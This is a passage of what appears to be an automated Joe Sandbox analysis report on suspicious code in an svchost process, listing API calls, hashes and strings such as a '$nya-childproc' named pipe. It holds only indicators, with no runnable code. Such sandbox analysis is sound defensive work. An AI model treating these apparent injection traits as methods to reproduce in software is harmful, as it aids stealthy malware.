                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: 01ba6e6857320073161db12d4c91d197189d3201306d29c150b2e464a9aba7b5
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 06113736A14B4083E710CB61F41D35AB7A4F38AFA5F980215EA9A13AA8CF3CC148CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 87362bcaa3792e5a4c3bde22928b52a8af9d2be7a5753092e360eb08d433d8a6
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 6E815821F0028187FB54AB75E84E399629DAF87F88F5C4125DA48877D6DF3CC9CD8642
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 21ed0e38a9b9bf3c3add615de4281dd6299f8a96e3642e169298de0fb22c4a2b
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: BA81F621F0064087FA60AB25944D3A963DCAB87F86F4C40189A8BB7796DF3CC84D9782
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: _$6Z$_$6Z$_$6Z$_$6Z$_$6Z
                                                          • API String ID: 3215553584-3921938813
                                                          • Opcode ID: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
                                                          • Instruction ID: 3b2bb9e880446d885a92473a28aba255902e4424a1e3e630c19797b1845b3aac
                                                          • Opcode Fuzzy Hash: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
                                                          • Instruction Fuzzy Hash: 9661B032F0064097FA689B29954C36A6AECA787F42F1D4415CA0B33795DF3CC98D86CB
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B31
                                                          • GetLastError.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B69
                                                          • FreeLibrary.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 76f1246603c3bb18419f38d00aeba41769e0225165ea4a687267aa0e8093a868
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 4A316F21B12A4093EE11DF16980C7A563DCB746FA1F9D0625DD1E67790EF3CC4488392
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: 6b32f3e46a1ce7fd8b8de312a58a35e07da95ba2daee6ad35c98ddecb6655408
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: BA116025B10B4087E751DB52E85E71976A8F78AFE4F484224EA5F97B94CF3CC4088741
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 0f8a66e6ed77636f1ed0b2f14fd8b528f712069ee59a874cfe4a1d755408b165
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 9851E335B01B4587EF05EF28E95C29423E9BB06F45F880825A56E273A5EF7CC91CC382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 24c8eb1c721162300a2066dfa6783493146a81dc3e88787b83f96c66ce783b45
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 5E319121B01B598BEA11DF16A98CB2963E8FB46F95F0C4020CF4A27B55EF3CC4698741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID: _$6Z
                                                          • API String ID: 2718003287-452956228
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: 268e0bf64f58330974bbaba108ddf57cd07ff1ee40941de8d1ad56834876199e
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: 88D1EC32B14A808AE711CFB6D5482DC37B9F356B98F584216DE5EA7B99DF38C00AC341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: 7914e069732184c8871121057e80f01b9ca265f513d2dd47937bd77fb910ee0a
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: BC112E25F1024043FA586B31685E76E22DEAB87FA2F5C4624A867773C6DF2CC4094396
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 506df8d917f2bc76aafa583f77b387a4aae76c161c2f169f50604e846a94c7eb
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: CF011731B14A8087EA14DB52A89C35963A9FB8AFC5F8840359E9E53B54DF3CC989C781
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 9b70d1ecbf1139e5dff184a89166bf11fbe9f0091192ee896d3ba2c320ab6499
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: 4D011765B11B4087EB249B61E84D71A72A8AB4BF46F080028CA4E273A4EF3DC54CC782
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID: _$6Z
                                                          • API String ID: 2933794660-452956228
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 09d662e5f67425faa2426f8c002c97408ee2dad5bf4657b9bd0cc106bfb4ecef
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 50115A26B10F048AFB00DF60E85D3A833A4F71AB58F440E21DA5E97754DF7CC1588341
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 04f708c2cc00568c8c93436304c1e2414141781b11ab3e3701c71d244ff32fbf
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 29F04F72B04A8593EB208B61F5CC3597375F746F89F8C4021DA4A57954DF6CC69DCB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: c36395cbba2f7c9cab4dbe5683d5b26fd9f757fb1dbd079cfaaeac44d0e0afa6
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: D9F08C64B04B8083EA048B13B91D219B269BB4AFC1F8C8430EE4B27B18CF6CC4498701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 70ab6fa0bba61b1abcbd251998a6a3394bebcc369c9fa9f57e40477172e4f5eb
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 63F09661B0060143EA108B54985E3593368EB47F61F5C0619DA6B6B5E4CF2CC44CC341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: 7f00b171df67a85d5c29ec87981b708a1dced5486be2c891d81cff1721883d8f
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: F9020B32619B8486EB60CB05F49835AB7E4F3C6B95F140015EACE97BA8DF7CC488CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: d9d923407056e679629dfec41f53747ac3185b939386cc03978ddc61ea24e902
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: DF51CE35B046018BE724CB26A54CA5AB3E8F38AF81F584029DE5B63B54DF3DC909CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: b97430315ecd66362444c0c209b691b70b1b441293f497608c0ab2486a684d2f
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: C051A136B14A1187EB24DF26A54CA1A73E8F38AF85F484119DD4B63754DF3DC849CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: d5d08af27fbf266ffb0255115ca435791e015f7d87f3644beaa2d82d73452d82
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: E161DC32A29A84C7E760CB15E45C31AB7E8F389B45F140115FA8E93BA8DF7CC548CB42
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
